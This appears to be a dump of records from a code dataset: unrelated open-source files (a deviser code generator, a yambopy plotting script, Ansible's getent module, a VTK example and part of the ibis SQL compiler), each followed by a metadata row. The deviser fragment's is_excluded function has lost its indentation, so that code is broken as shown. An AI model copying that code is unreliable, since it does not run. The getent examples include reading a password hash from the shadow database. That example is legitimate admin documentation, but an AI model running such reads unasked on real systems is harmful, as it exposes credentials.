                                  'introduced.'.format(self.name,
                                                       fullname,
                                                       self.package.lower())
        self.write_blank_comment_line()
        self.write_comment_line('@class {0}'.format(self.class_name))
        if extension:
            self.write_comment_line('@sbmlbrief{0}{1}{2} Base extension class'
                                    '.'.format(self.open_br,
                                               self.package.lower(),
                                               self.close_br))
            self.write_blank_comment_line()
            self.write_comment_line('@class {0}PkgNamespaces'
                                    ''.format(up_package))
            self.write_comment_line('@sbmlbrief{0}{1}{2} SBMLNamespaces '
                                    'extension.'
                                    ''.format(self.open_br,
                                              self.package.lower(),
                                              self.close_br))
        elif plugin:
            self.write_comment_line('@sbmlbrief{0}{1}{2} Extension of '
                                    '{3}.'.format(self.open_br,
                                                  self.package.lower(),
                                                  self.close_br,
                                                  self.class_object['sbase']))
        elif validator:
            # NOTE(review): the original source mixed literal curly quotes
            # with a '&rdquo' entity missing its trailing semicolon in the
            # line below — confirm the intended entities against upstream.
            self.write_comment_line('@sbmlbrief{0}{1}{2} Entry point for '
                                    '&ldquo;{1}&rdquo; package validation'
                                    '.'.format(self.open_br,
                                               self.package.lower(),
                                               self.close_br))
            self.write_blank_comment_line()
            self.write_comment_line('@htmlinclude not-sbml-warning.html')
            self.write_blank_comment_line()
            self.write_comment_line('@copydetails doc_common_intro_'
                                    'package_validators')
            self.write_blank_comment_line()
            self.write_comment_line('{0}'.format(validator_class_comment))
            self.write_blank_comment_line()
            self.write_comment_line('@copydetails doc_section_package_'
                                    'validators_general_info')
        else:
            self.write_comment_line('@sbmlbrief{0}{1}{2} TODO:'
                                    '{3}'.format(self.open_br,
                                                 self.package.lower(),
                                                 self.close_br,
                                                 self.brief_description))
@staticmethod
def is_excluded(filename):
excluded = False
excluded_files = ['Types', 'fwd', 'Error', 'ErrorTable',
'ConsistencyValidator', 'package', 'register']
i = 0
while not excluded and i < len(excluded_files):
if filename.endswith(excluded_files[i]):
excluded = True
i += 1
if not excluded:
if filename == global_variables.library_name.lower():
excluded = True
return excluded
|
hovo1990/deviser
|
generator/base_files/BaseFile.py
|
Python
|
lgpl-2.1
| 22,143
|
[
"VisIt"
] |
224809df4bcbbf7fc562031b9684767f8376caaf215274d67d0a76145ed358cb
|
# This script reads the carrier database
# and display it along a path in histogram form
# along with a representation of the carriers in energy space
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from yambopy import *
import matplotlib.gridspec as gridspec
from matplotlib.colors import Normalize
from scipy.optimize import curve_fit
import os
############
# SETTINGS #
############
folder = 'rt-30x30'
calc = 'QSSIN-100.0fs-2.08eV-300K-DG' # Where RT carrier output is
path = [[0.0,0.0,0.0],[0.5,0.0,0.0],[0.33333,0.33333,0.0],[0.0,0.0,0.0]]
nbv = 2 ; nbc = 2 # nb of valence and conduction bands
occ_scaling = 1 # max occupation will be 1eV high
degen_thres = 0.1 # Energy below which two bands are considered degenerate
########
# INIT #
########
# For saving pictures
# NOTE(review): os.system('mkdir -p ...') is POSIX-only; os.makedirs with
# exist_ok=True would be portable — confirm before changing.
os.system('mkdir -p occupations/%s/%s'%(folder,calc))
# Instance containing bandstructure (as used in RT sim) and occupations
yrt = YamboRTDB(folder=folder,calc=calc)
yrt.get_path(path) # Generates kindex
### aliases
times = [i * 1e15 for i in yrt.times] # carriers output times, in fs
nbands = yrt.nbands # number of bands in the RT simulation
if nbv+nbc != nbands:
    raise NameError('Incompatible number of bands, set nbv and nbc in script.')
## 'path-plot' variables
kindex = yrt.bands_indexes # kpoint indexes (in order) to draw path
eigenvalues = yrt.eigenvalues[kindex,:] # eigenvalues of the bands included in the RT simulation
#
max_occ = np.amax(yrt.occupations[:,kindex,:]) # used to size the distribution plots
occupations = yrt.occupations[:,kindex,:]/max_occ*occ_scaling # format time,kindex,band index (from 0 to nbands, only on path)
norm=Normalize(vmin=0, vmax=occ_scaling, clip=False) # normalization class for the color gradient on bands
#
xocc = np.arange(len(kindex)) # array of ints to plot occupation on path properly
##
## 'fit' variables and function
# FD distrib for fit
def fermi_dirac(E,a,T): # declare E first for fit
    """Fermi-Dirac distribution 1/(1 + exp((E - a)/T)).

    E : energy (scalar or ndarray, eV); a : chemical potential (eV);
    T : temperature expressed in eV (k_B * T). Returns the occupation.
    """
    # `from __future__ import division` is in effect at the top of this
    # script, so plain `/` is already true division for scalars and
    # arrays — the Python-2 old_div() shim was a no-op here.
    return 1.0 / (1.0 + np.exp((E - a) / T))
#
KtoeV = 8.61733e-5
#
# xeng is an array of values to plot the fit properly
xeng = np.linspace(np.amin(eigenvalues[:,list(range(nbv))]), np.amax(eigenvalues[:,list(range(nbv,nbands))]),1000)
##
##############
# EXT. FIELD #
##############
# The external field is read from the o- file
ext = np.loadtxt('%s/%s/pulse/o-pulse.external_field'%(folder,calc))
field = old_div(ext[:,2],max(abs(ext[:,2]))) # polarization : x=1,y=2,z=3
##################
# ENERGY DISTRIB #
##################
# Sort the (n,k) pairs between positive and negative energies
# (If the same energy appears twice, it must not be summed over)
list_e=[] ; list_h=[]
for k in range(yrt.nkpoints):
    for n in range(yrt.nbands):
        e = yrt.eigenvalues[k,n]
        if e<=0.0:
            list_h.append((k,n))
        else:
            list_e.append((k,n))
# Build the occupation tables occ_x[t,(nk)_index,(e|occ)]
occ_e = np.zeros((len(times),len(list_e),2))
for t in range(len(times)):
    for i,(k,n) in enumerate(list_e):
        occ_e[t,i,0]=yrt.eigenvalues[k,n]
        occ_e[t,i,1]=yrt.occupations[t,k,n]
occ_h = np.zeros((len(times),len(list_h),2))
for t in range(len(times)):
    for i,(k,n) in enumerate(list_h):
        occ_h[t,i,0]=yrt.eigenvalues[k,n]
        occ_h[t,i,1]=yrt.occupations[t,k,n]
# *(-1) on holes to fit the same way as electrons
occ_h *= -1
#################
# BAR PLOT DATA #
#################
# occupations in CBs/VBs are summed for easier reading if there are more than one
# Recall that 'occupations' was normalized then multiplied by occ_scaling (for esthetics)
# NOTE(review): occ_v/occ_c are defined only when nbv > 1, yet they are
# used unconditionally below (ymax_v/ymax_c and in the plot loop) — with
# nbv == 1 this script raises NameError. Confirm intended usage.
if nbv > 1:
    # one entry per band +1 for the total occ
    occ_v = np.zeros((len(times),len(kindex),nbv+1))
    occ_c = np.zeros((len(times),len(kindex),nbc+1))
    for n in range(nbv):
        occ_v[:,:,n] = -occupations[:,:,n] # minus sign to get positive occupations
        np.add(occ_v[:,:,n],occ_v[:,:,nbv],occ_v[:,:,nbv]) # each time we add the occ of the current band to the total
    for n in range(nbc):
        occ_c[:,:,n] = occupations[:,:,n+nbv] # +nbv to read CBs
        np.add(occ_c[:,:,n],occ_c[:,:,nbc],occ_c[:,:,nbc]) # each time we add the occ of the current band to the total
####################
# TIME LOOP & PLOT #
####################
# Gridspec allows to place subplots on a grid
# spacing for exemple can be customised
gs = gridspec.GridSpec(9, 8)
# y range for band structure & energy plots
ymin_v= np.amin(eigenvalues[:,:nbv])-0.1
ymin_c= np.amin(eigenvalues[:,nbv:])-0.1
# NOTE(review): ymax_v uses occ_c where occ_v looks intended — confirm.
ymax_v= max(np.amax(eigenvalues[:,:nbv])+np.amax(occ_c[:,:,nbv:])+0.1, np.amax(eigenvalues[:,:nbv])+0.1)
ymax_c= max(np.amin(eigenvalues[:,nbv:])+np.amax(occ_c[:,:,nbv:])+0.1, np.amax(eigenvalues[:,nbv:])+0.1)
###
# One figure per output time: band structure with occupation histograms,
# the external field trace, and rotated energy-distribution fits.
for t in range(len(times)):
    i=t
    print(times[i])
    name = 'occupations/'+folder+'/'+calc+'/%d.png' % (times[t])
    fig = plt.figure()
    fig.suptitle('Occupation of the bands and fit to the Fermi-Dirac distribution',fontsize=14,ha='center')
    ####### bandstructure w/ occupation plot
    ax1c = plt.subplot(gs[0:4,0:-2])
    ax1v = plt.subplot(gs[4:8,0:-2])
    # remove x ticks
    # NOTE(review): 'off' string values for tick_params are deprecated in
    # modern matplotlib (use booleans) — confirm target version.
    ax1c.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax1v.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    # set x range
    ax1c.set_xlim((0,xocc[-1]))
    ax1v.set_xlim((0,xocc[-1]))
    # y range is defined with ax3 and ax4 (they share y axis with ax1)
    # Plot band structure
    ax1v.plot(eigenvalues[:,:nbv],'k-',lw=2,zorder=0)
    ax1c.plot(eigenvalues[:,nbv:],'k-',lw=2,zorder=0)
    ## Colored spots when degen is beyond degen_thres
    # For that, we compare eigenvalues of (k,n) with (k,n+1)
    # note : if more than 2 VB/CB, this scatter scheme might not be optimal (e.g. with 1 + 2 degen bands)
    # VB
    for n in range(nbv-1): # we compare n and n+1 <= nbv
        # bool array with condition on degeneracy
        diff_eigen = abs(eigenvalues[:,n]-eigenvalues[:,n+1])
        # plot for points that respect the condition
        ax1v.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,n] ,s=30, c=occ_v[t,diff_eigen>degen_thres,n] ,cmap='plasma',alpha=1,edgecolors='none',norm=norm)
        ax1v.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,n+1],s=30, c=occ_v[t,diff_eigen>degen_thres,n+1],cmap='plasma',alpha=1,edgecolors='none',norm=norm)
    # CB
    for n in range(nbc-1):
        diff_eigen = abs(eigenvalues[:,nbv+n]-eigenvalues[:,nbv+n+1])
        ax1c.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,nbv+n] ,s=30, c=occ_c[t,diff_eigen>degen_thres,n] ,cmap='plasma',alpha=1,edgecolors='none',norm=norm)
        ax1c.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,nbv+n+1],s=30, c=occ_c[t,diff_eigen>degen_thres,n+1],cmap='plasma',alpha=1,edgecolors='none',norm=norm)
    ## occupation in the form of histograms
    # small y-shift for better reading
    ax1v.bar(xocc,occ_v[t,:,nbv],width=0.4,bottom=eigenvalues[:,nbv-1]+0.1,color='blue',edgecolor='none')
    ax1c.bar(xocc,occ_c[t,:,nbc],width=0.4,bottom=eigenvalues[:,nbands-1]+0.1,color='red',edgecolor='none')
    # text and labels
    fig.text(0.05,0.6,'Energy (eV)',size=16,rotation='vertical')
    fig.text(0.50,0.91, '%d fs'%times[t],size=16)
    ######## field plot
    ax2 = plt.subplot(gs[-1,:])
    # remove ticks and labels
    ax2.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax2.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')
    # text
    ax2.set_ylabel('Field')
    # frame size
    ax2.set_xlim((0,times[-1]))
    ax2.set_ylim((-1.3,1.3))
    # NOTE(review): slicing field by int(times[t]) assumes one field sample
    # per femtosecond in the o-pulse file — confirm the output cadence.
    ax2.plot(field[:int(times[t])])
    ## Plot of the occupation as a function of energy (rotated to match the band structure)
    ax3 = plt.subplot(gs[0:4,-2:],sharey=ax1c)
    ax4 = plt.subplot(gs[4:8,-2:],sharey=ax1v)
    # plot the data
    try: # does not break if fit is not found
        fit,cov = curve_fit(fermi_dirac,occ_e[i,:,0],occ_e[i,:,1])
    except RuntimeError:
        fit=np.array([0,0])
    ax3.scatter(occ_e[i,:,1],occ_e[i,:,0],s=10,color='black')
    ax3.plot(fermi_dirac(xeng,fit[0],fit[1]),xeng,'r-')
    ax3.text(0.5,0.9,'Electrons\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax3.transAxes,ha='center',va='center')
    try:
        fit,cov = curve_fit(fermi_dirac,occ_h[i,:,0],occ_h[i,:,1])
    except RuntimeError:
        fit=np.array([0,0])
    ax4.scatter(occ_h[i,:,1],-occ_h[i,:,0],color='black')
    ax4.plot(fermi_dirac(xeng,fit[0],fit[1]),-xeng,'b-')
    ax4.text(0.5,0.1,'Holes\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax4.transAxes,ha='center',va='center')
    # set x and y range
    ax4.set_xlim(-0.1*max_occ,1.1*max_occ)
    ax3.set_xlim(-0.1*max_occ,1.1*max_occ)
    ax3.set_ylim(( ymin_c,ymax_c ))
    ax4.set_ylim(( ymin_v,ymax_v ))
    # hide some ticks/labels
    ax3.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax3.tick_params(axis='y',labelleft='off',labelright='off')
    ax4.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax4.tick_params(axis='y',labelleft='off',labelright='off')
    plt.savefig( name ,transparent=False,dpi=300)
    print(name)
    #plt.show()
    plt.close(fig)
|
alexmoratalla/yambopy
|
scripts/realtime/plot_occ.py
|
Python
|
bsd-3-clause
| 9,348
|
[
"DIRAC"
] |
f6176e8112519f5301e42159e72c5a99e385875dde145c8ffd91cda78130615a
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Brian Coca <brian.coca+dev@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: getent
short_description: A wrapper to the unix getent utility
description:
    - Runs getent against one of its various databases and returns information into
the host's facts, in a getent_<database> prefixed variable.
version_added: "1.8"
options:
database:
description:
- The name of a getent database supported by the target system (passwd, group,
hosts, etc).
type: str
required: True
key:
description:
- Key from which to return values from the specified database, otherwise the
full contents are returned.
type: str
default: ''
service:
description:
- Override all databases with the specified service
- The underlying system must support the service flag which is not always available.
type: str
version_added: "2.9"
split:
description:
- "Character used to split the database values into lists/arrays such as ':' or '\t', otherwise it will try to pick one depending on the database."
type: str
fail_key:
description:
- If a supplied key is missing this will make the task fail if C(yes).
type: bool
default: 'yes'
extends_documentation_fragment:
- action_common_attributes
- action_common_attributes.facts
attributes:
check_mode:
support: full
diff_mode:
support: none
facts:
support: full
platform:
platforms: posix
notes:
- Not all databases support enumeration, check system documentation for details.
author:
- Brian Coca (@bcoca)
'''
EXAMPLES = '''
- name: Get root user info
getent:
database: passwd
key: root
- debug:
var: ansible_facts.getent_passwd
- name: Get all groups
getent:
database: group
split: ':'
- debug:
var: ansible_facts.getent_group
- name: Get all hosts, split by tab
getent:
database: hosts
- debug:
var: ansible_facts.getent_hosts
- name: Get http service info, no error if missing
getent:
database: services
key: http
fail_key: False
- debug:
var: ansible_facts.getent_services
- name: Get user password hash (requires sudo/root)
getent:
database: shadow
key: www-data
split: ':'
- debug:
var: ansible_facts.getent_shadow
'''
RETURN = '''
ansible_facts:
description: Facts to add to ansible_facts.
returned: always
type: dict
contains:
getent_<database>:
description:
- A list of results or a single result as a list of the fields the db provides
- The list elements depend on the database queried, see getent man page for the structure
        - Starting at 2.11 it now returns multiple duplicate entries, previously it only returned the last one
returned: always
type: list
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
def main():
    """Entry point: run getent against a database and return it as facts.

    Builds the getent command line from the module parameters, runs it,
    and maps each output record into a ``getent_<database>`` fact dict
    keyed by the record's first field. Exits via module.exit_json on
    success (or tolerated missing key) and module.fail_json otherwise.
    """
    module = AnsibleModule(
        argument_spec=dict(
            database=dict(type='str', required=True),
            key=dict(type='str', no_log=False),
            service=dict(type='str'),
            split=dict(type='str'),
            fail_key=dict(type='bool', default=True),
        ),
        supports_check_mode=True,
    )
    # Databases whose records are colon-delimited by convention
    colon = ['passwd', 'shadow', 'group', 'gshadow']
    database = module.params['database']
    key = module.params.get('key')
    split = module.params.get('split')
    service = module.params.get('service')
    fail_key = module.params.get('fail_key')
    getent_bin = module.get_bin_path('getent', True)
    if key is not None:
        cmd = [getent_bin, database, key]
    else:
        cmd = [getent_bin, database]
    if service is not None:
        cmd.extend(['-s', service])
    if split is None and database in colon:
        split = ':'
    try:
        rc, out, err = module.run_command(cmd)
    except Exception as e:
        module.fail_json(msg=to_native(e), exception=traceback.format_exc())
    msg = "Unexpected failure!"
    dbtree = 'getent_%s' % database
    results = {dbtree: {}}
    if rc == 0:
        # count occurrences per key so duplicates are promoted to lists
        seen = {}
        for line in out.splitlines():
            record = line.split(split)
            if record[0] in seen:
                # more than one result for same key, ensure we store in a list
                if seen[record[0]] == 1:
                    results[dbtree][record[0]] = [results[dbtree][record[0]]]
                results[dbtree][record[0]].append(record[1:])
                seen[record[0]] += 1
            else:
                # new key/value, just assign
                results[dbtree][record[0]] = record[1:]
                seen[record[0]] = 1
        module.exit_json(ansible_facts=results)
    elif rc == 1:
        msg = "Missing arguments, or database unknown."
    elif rc == 2:
        msg = "One or more supplied key could not be found in the database."
        if not fail_key:
            # tolerated miss: report the key as None instead of failing
            results[dbtree][key] = None
            module.exit_json(ansible_facts=results, msg=msg)
    elif rc == 3:
        msg = "Enumeration not supported on this database."
    # any non-zero rc not converted to exit_json above is fatal
    module.fail_json(msg=msg)
if __name__ == '__main__':
    main()
|
privateip/ansible
|
lib/ansible/modules/getent.py
|
Python
|
gpl-3.0
| 5,521
|
[
"Brian"
] |
1c40bfb430509851ce2d98d95a9453780cc8fff9160a61b5d2a58c187dba3f4f
|
# Build two linked VTK views of one random geo-referenced graph:
# a 3D geospatial globe view and a flat graph-layout view. Selections
# are shared between them through a vtkAnnotationLink.
from vtk import *
import os.path
data_dir = "../../../../VTKData/Data/Infovis/Images/"
if not os.path.exists(data_dir):
    # fall back one directory deeper (depends on build layout)
    data_dir = "../../../../../VTKData/Data/Infovis/Images/"
source = vtkGeoRandomGraphSource()
source.DirectedOff()
source.SetNumberOfVertices(100)
source.SetEdgeProbability(0.00) # produces a tree
source.SetUseEdgeProbability(True)
source.AllowParallelEdgesOn()
source.AllowSelfLoopsOn()
source.SetStartWithTree(True)
# Create a 3D geospatial view
view = vtkGeoView()
view.GetRenderWindow().SetSize(600, 600)
# Create the background image
reader = vtkJPEGReader()
reader.SetFileName(data_dir + "NE2_ps_bath.jpg")
reader.Update()
view.AddDefaultImageRepresentation(reader.GetOutput())
# Create graph
graph_rep = vtkRenderedGraphRepresentation()
graph_rep.SetInputConnection(source.GetOutputPort())
graph_rep.SetVertexColorArrayName("vertex id")
graph_rep.ColorVerticesByArrayOn()
graph_rep.SetEdgeColorArrayName("edge id")
graph_rep.ColorEdgesByArrayOn()
graph_rep.SetVertexLabelArrayName("vertex id")
graph_rep.VertexLabelVisibilityOn()
# place vertices by their longitude/latitude attributes
graph_rep.SetLayoutStrategyToAssignCoordinates("longitude", "latitude", None)
strategy = vtkGeoEdgeStrategy()
strategy.SetExplodeFactor(.1)
graph_rep.SetEdgeLayoutStrategy(strategy)
view.AddRepresentation(graph_rep)
# Make a normal graph layout view
view2 = vtkGraphLayoutView()
view2.GetRenderWindow().SetSize(600, 600)
view2.AddRepresentationFromInputConnection(source.GetOutputPort())
view2.SetVertexColorArrayName("vertex id")
view2.ColorVerticesOn()
view2.SetEdgeColorArrayName("edge id")
view2.ColorEdgesOn()
view2.SetVertexLabelArrayName("vertex id")
view2.VertexLabelVisibilityOn()
# Apply a theme to the views
theme = vtkViewTheme.CreateMellowTheme()
theme.SetLineWidth(4)
theme.SetPointSize(8)
theme.SetCellSaturationRange(.5,.5)
theme.SetSelectedCellColor(1,0,1)
theme.SetSelectedPointColor(1,0,1)
view.ApplyViewTheme(theme)
graph_rep.ApplyViewTheme(theme)
view2.ApplyViewTheme(theme)
theme.FastDelete()
# share selections between the two views
link = vtkAnnotationLink()
graph_rep.SetAnnotationLink(link)
view2.GetRepresentation(0).SetAnnotationLink(link)
updater = vtkViewUpdater()
updater.AddView(view)
updater.AddView(view2)
view.ResetCamera()
view2.ResetCamera()
view.Render()
view2.Render()
# hand control to the interactor event loop (blocks until window close)
view.GetInteractor().Initialize()
view.GetInteractor().Start()
|
collects/VTK
|
Examples/Infovis/Python/geoview.py
|
Python
|
bsd-3-clause
| 2,300
|
[
"VTK"
] |
9e98441eddf8c8e6be78590f3116ed5adc38176a6fbb1ac36aabcba910e3e4c0
|
# Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
import ibis.common as com
import ibis.expr.analysis as L
import ibis.expr.operations as ops
import ibis.expr.types as ir
from ibis.sql.context import QueryContext
import ibis.sql.ddl as ddl
import ibis.sql.transforms as transforms
import ibis.util as util
def build_ast(expr, context=None):
    """Compile *expr* into a QueryAST holding its query objects."""
    return QueryBuilder(expr, context=context).get_result()
def _get_query(expr, context):
    """Return (primary query, context) for *expr*."""
    ast = build_ast(expr, context)
    return ast.queries[0], ast.context
def to_sql(expr, context=None):
    """Render *expr* as a SQL string."""
    query, ctx = _get_query(expr, context)
    return query.compile(ctx)
# ---------------------------------------------------------------------
class QueryAST(object):
    # Simple container pairing the compilation context with the ordered
    # list of queries (setup DDL, primary select, teardown DDL).
    def __init__(self, context, queries):
        """Store *context* (QueryContext) and *queries* (list of queries)."""
        self.context = context
        self.queries = queries
class QueryBuilder(object):
    """Compile an ibis expression into a QueryAST.

    Dispatches on the root operation: a Union is compiled directly into
    a ddl.Union; anything else goes through SelectBuilder.
    """
    def __init__(self, expr, context=None):
        self.expr = expr
        self.context = QueryContext() if context is None else context
    def get_result(self):
        # TODO: any setup / teardown DDL statements will need to be done prior
        # to building the result set-generating statements.
        root_op = self.expr.op()
        if isinstance(root_op, ops.Union):
            result = self._make_union()
        else:
            result = self._make_select()
        return QueryAST(self.context, [result])
    def _make_union(self):
        union_op = self.expr.op()
        return ddl.Union(union_op.left, union_op.right,
                         distinct=union_op.distinct,
                         context=self.context)
    def _make_select(self):
        return SelectBuilder(self.expr, self.context).get_result()
class SelectBuilder(object):
"""
Transforms expression IR to a query pipeline (potentially multiple
queries). There will typically be a primary SELECT query, perhaps with some
subqueries and other DDL to ingest and tear down intermediate data sources.
Walks the expression tree and catalogues distinct query units, builds
select statements (and other DDL types, where necessary), and records
relevant query unit aliases to be used when actually generating SQL.
"""
    def __init__(self, expr, context):
        """Initialize per-query compilation state for *expr* in *context*."""
        self.expr = expr
        # _adapt_expr may wrap a value expression; result_handler
        # post-processes the executed result
        self.query_expr, self.result_handler = _adapt_expr(self.expr)
        self.sub_memo = {}
        self.context = context
        self.queries = []
        # components of the SELECT statement being assembled
        self.table_set = None
        self.select_set = None
        self.group_by = None
        self.having = None
        self.filters = []
        self.limit = None
        self.sort_by = []
        self.subqueries = []
        self.distinct = False
        # ops already visited during _collect (avoid re-walking shared nodes)
        self.op_memo = util.IbisSet()
    def get_result(self):
        """Assemble setup/select/teardown queries; return the main select."""
        # make idempotent
        if len(self.queries) > 0:
            return self._wrap_result()
        # Generate other kinds of DDL statements that may be required to
        # execute the passed query. For example, loading
        setup_queries = self._generate_setup_queries()
        # Make DDL statements to be executed after the main primary select
        # statement(s)
        teardown_queries = self._generate_teardown_queries()
        select_query = self._build_result_query()
        self.queries.extend(setup_queries)
        self.queries.append(select_query)
        self.queries.extend(teardown_queries)
        return select_query
    def _generate_setup_queries(self):
        # Hook for subclasses: DDL to run before the main select
        return []
    def _generate_teardown_queries(self):
        # Hook for subclasses: DDL to run after the main select
        return []
    def _build_result_query(self):
        """Walk the expression, analyze it, and emit the ddl.Select."""
        self._collect_elements()
        self._analyze_select_exprs()
        self._analyze_filter_exprs()
        self._analyze_subqueries()
        self._populate_context()
        return ddl.Select(self.context, self.table_set, self.select_set,
                          subqueries=self.subqueries,
                          where=self.filters,
                          group_by=self.group_by,
                          having=self.having,
                          limit=self.limit,
                          order_by=self.sort_by,
                          distinct=self.distinct,
                          result_handler=self.result_handler,
                          parent_expr=self.query_expr)
    def _populate_context(self):
        """Assign table aliases and flag correlated-subquery aliasing."""
        # Populate aliases for the distinct relations used to output this
        # select statement.
        if self.table_set is not None:
            self._make_table_aliases(self.table_set)
        # XXX: This is a temporary solution to the table-aliasing / correlated
        # subquery problem. Will need to revisit and come up with a cleaner
        # design (also as one way to avoid pathological naming conflicts; for
        # example, we could define a table alias before we know that it
        # conflicts with the name of a table used in a subquery, join, or
        # another part of the query structure)
        # There may be correlated subqueries inside the filters, requiring that
        # we use an explicit alias when outputting as SQL. For now, we're just
        # going to see if any table nodes appearing in the where stack have
        # been marked previously by the above code.
        for expr in self.filters:
            needs_alias = _foreign_ref_check(self, expr)
            if needs_alias:
                self.context.set_always_alias()
    def _make_table_aliases(self, expr):
        """Assign aliases to the leaf tables under *expr* (joins recurse)."""
        ctx = self.context
        node = expr.op()
        if isinstance(node, ops.Join):
            for arg in node.args:
                if not isinstance(arg, ir.TableExpr):
                    continue
                self._make_table_aliases(arg)
        else:
            # tables extracted as subqueries already carry an alias
            if not ctx.is_extracted(expr):
                ctx.make_alias(expr)
# ---------------------------------------------------------------------
# Expr analysis / rewrites
def _analyze_select_exprs(self):
new_select_set = []
for expr in self.select_set:
new_expr = self._visit_select_expr(expr)
new_select_set.append(new_expr)
self.select_set = new_select_set
    def _visit_select_expr(self, expr):
        """Rewrite a single select expression, dispatching on op type.

        Looks for a specialized _visit_select_<OpName> handler first;
        otherwise recursively visits the arguments of value nodes and
        rebuilds the expression only if any argument changed.
        """
        op = expr.op()
        method = '_visit_select_{0}'.format(type(op).__name__)
        if hasattr(self, method):
            f = getattr(self, method)
            return f(expr)
        unchanged = True
        if isinstance(op, ops.ValueNode):
            new_args = []
            for arg in op.args:
                if isinstance(arg, ir.Expr):
                    new_arg = self._visit_select_expr(arg)
                    if arg is not new_arg:
                        unchanged = False
                    new_args.append(new_arg)
                else:
                    new_args.append(arg)
            if not unchanged:
                # rebuild with the rewritten arguments
                return expr._factory(type(op)(*new_args))
            else:
                return expr
        else:
            return expr
    def _visit_select_Histogram(self, expr):
        """Rewrite a Histogram op into a bucket-index expression.

        When binwidth/base are not both given, min/max aggregates are
        cross-joined onto the table set so the bin parameters can be
        computed within the query itself.
        """
        op = expr.op()
        EPS = 1e-13
        if op.binwidth is None or op.base is None:
            # unique suffix so repeated histograms don't collide on names
            aux_hash = op.aux_hash or util.guid()[:6]
            min_name = 'min_%s' % aux_hash
            max_name = 'max_%s' % aux_hash
            minmax = self.table_set.aggregate([op.arg.min().name(min_name),
                                               op.arg.max().name(max_name)])
            self.table_set = self.table_set.cross_join(minmax)
            if op.base is None:
                # EPS pushes the base just below the minimum so the smallest
                # value lands in bin 0 instead of on the boundary
                base = minmax[min_name] - EPS
            else:
                base = op.base
            binwidth = (minmax[max_name] - base) / (op.nbins - 1)
        else:
            # Have both a bin width and a base
            binwidth = op.binwidth
            base = op.base
        bucket = (op.arg - base) / binwidth
        return bucket.floor().name(expr._name)
def _analyze_filter_exprs(self):
# What's semantically contained in the filter predicates may need to be
# rewritten. Not sure if this is the right place to do this, but a
# starting point
# Various kinds of semantically valid WHERE clauses may need to be
# rewritten into a form that we can actually translate into valid SQL.
new_where = []
for expr in self.filters:
new_expr = self._visit_filter(expr)
# Transformations may result in there being no outputted filter
# predicate
if new_expr is not None:
new_where.append(new_expr)
self.filters = new_where
    def _visit_filter(self, expr):
        """Analyze/rewrite one WHERE expression; may return None to drop it."""
        # Dumping ground for analysis of WHERE expressions
        # - Subquery extraction
        # - Conversion to explicit semi/anti joins
        # - Rewrites to generate subqueries
        op = expr.op()
        method = '_visit_filter_{0}'.format(type(op).__name__)
        if hasattr(self, method):
            f = getattr(self, method)
            return f(expr)
        unchanged = True
        if isinstance(expr, ir.ScalarExpr):
            # scalar reductions become subquery expressions
            if ops.is_reduction(expr):
                return self._rewrite_reduction_filter(expr)
        if isinstance(op, ops.BinaryOp):
            left = self._visit_filter(op.left)
            right = self._visit_filter(op.right)
            unchanged = left is op.left and right is op.right
            if not unchanged:
                return type(expr)(type(op)(left, right))
            else:
                return expr
        elif isinstance(op, (ops.Any, ops.BooleanValueOp,
                             ops.TableColumn, ir.Literal)):
            # leaf nodes: nothing to rewrite
            return expr
        elif isinstance(op, ops.ValueNode):
            visited = [self._visit_filter(arg)
                       if isinstance(arg, ir.Expr) else arg
                       for arg in op.args]
            unchanged = True
            for new, old in zip(visited, op.args):
                if new is not old:
                    unchanged = False
            if not unchanged:
                return type(expr)(type(op)(*visited))
            else:
                return expr
        else:
            raise NotImplementedError(type(op))
    def _rewrite_reduction_filter(self, expr):
        """Turn a scalar reduction predicate into an array subquery."""
        # Find the table that this reduction references.
        # TODO: what about reductions that reference a join that isn't visible
        # at this level? Means we probably have the wrong design, but will have
        # to revisit when it becomes a problem.
        aggregation = _reduction_to_aggregation(expr, agg_name='tmp')
        return aggregation.to_array()
    def _visit_filter_Any(self, expr):
        """Rewrite an Any predicate into an EXISTS-style construct."""
        # Rewrite semi/anti-join predicates in way that can hook into SQL
        # translation step
        transform = transforms.AnyToExistsTransform(self.context, expr,
                                                    self.table_set)
        return transform.get_result()
    # NotAny (anti-join / NOT EXISTS) shares the same rewrite machinery
    _visit_filter_NotAny = _visit_filter_Any
    def _visit_filter_TopK(self, expr):
        """Rewrite a TopK predicate as a semi join against the top-k rows.

        Returns None because the predicate is consumed: the semi join is
        attached directly to self.table_set.
        """
        # Top K is rewritten as an
        # - aggregation
        # - sort by
        # - limit
        # - left semi join with table set
        metric_name = '__tmp__'
        op = expr.op()
        metrics = [op.by.name(metric_name)]
        arg_table = L.find_base_table(op.arg)
        by_table = L.find_base_table(op.by)
        if arg_table.equals(by_table):
            agg = arg_table.aggregate(metrics, by=[op.arg])
        else:
            agg = self.table_set.aggregate(metrics, by=[op.arg])
        # descending sort then limit picks the k largest metric values
        rank_set = agg.sort_by([(metric_name, False)]).limit(op.k)
        pred = (op.arg == getattr(rank_set, op.arg.get_name()))
